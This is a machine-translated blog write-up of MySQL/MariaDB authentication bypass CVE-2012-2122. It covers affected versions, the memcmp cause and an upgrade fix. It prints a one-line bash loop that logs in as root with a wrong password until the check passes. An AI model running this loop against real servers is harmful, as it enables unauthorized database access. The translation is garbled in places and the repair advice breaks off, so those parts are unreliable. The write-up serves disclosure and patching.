当前位置:网站首页>MySQL authentication bypass vulnerability (cve-2012-2122)
MySQL authentication bypass vulnerability (cve-2012-2122)
2022-07-06 22:39:00 【OOOOOK. two thousand and twenty-one】
Vulnerability profile
When the connection MariaDB/MySQL when , The password entered will be compared with the expected correct password , Due to improper handling , Can lead to even memcmp () Returns a nonzero value , Also can make MySQL Think two passwords are the same . That is to say, as long as you know the user name , Try again and again to log in directly SQL database .
Affected version
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL
- versions from 5.1.63, 5.5.24, 5.6.6 are not.
Reasons for appearance
This vulnerability is due to memcmp Function only returns -128 To 127 Values in range , Optimized on some platforms , Cause even memcmp() Returns a nonzero value , Also can make MySQL Think two passwords are the same . about 256 You can succeed once .
Loophole recurrence
Scan open ports
use MSF attack
EXP
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
Repair
upgrade MySQL edition ,( Those lower than the following versions must be upgraded to the latest version :5.0 Version below 5.0.96;5.1 Version below 5.1.63;5.5 Version below 5.5.25) stop it mysql, Back up the entire mysql, The installation directory ,data Catalog ( This step is only to prevent escalation
边栏推荐
- 2022-07-05 stonedb sub query processing parsing time analysis
- The SQL response is slow. What are your troubleshooting ideas?
- Build op-tee development environment based on qemuv8
- UDP编程
- Return keyword
- Mysql 身份认证绕过漏洞(CVE-2012-2122)
- 关于声子和热输运计算中BORN电荷和non-analytic修正的问题
- Puppeteer连接已有Chrome浏览器
- MySQL ---- first acquaintance with MySQL
- poj 1094 Sorting It All Out (拓扑排序)
猜你喜欢
Daily question 1: force deduction: 225: realize stack with queue
Export MySQL table data in pure mode
自制J-Flash烧录工具——Qt调用jlinkARM.dll方式
软考高级(信息系统项目管理师)高频考点:项目质量管理
Config:invalid signature solution and troubleshooting details
Traversal of a tree in first order, middle order, and then order
MySQL----初识MySQL
Aardio - integrate variable values into a string of text through variable names
视图(view)
Aardio - 利用customPlus库+plus构造一个多按钮组件
随机推荐
TypeScript获取函数参数类型
Typescript get function parameter type
如何用程序确认当前系统的存储模式?
Project duplicate template
Classification, function and usage of MySQL constraints
qt quick项目offscreen模式下崩溃的问题处理
Should novice programmers memorize code?
视图(view)
Self made j-flash burning tool -- QT calls jlinkarm DLL mode
LeetCode 练习——剑指 Offer 26. 树的子结构
How to use flexible arrays?
Dealing with the crash of QT quick project in offscreen mode
Jafka来源分析——Processor
2022-07-05 使用tpcc对stonedb进行子查询测试
Config:invalid signature solution and troubleshooting details
Aardio - Method of batch processing attributes and callback functions when encapsulating Libraries
MySQL----初识MySQL
Use ECs to set up an agent
2022-07-05 use TPCC to conduct sub query test on stonedb
How to confirm the storage mode of the current system by program?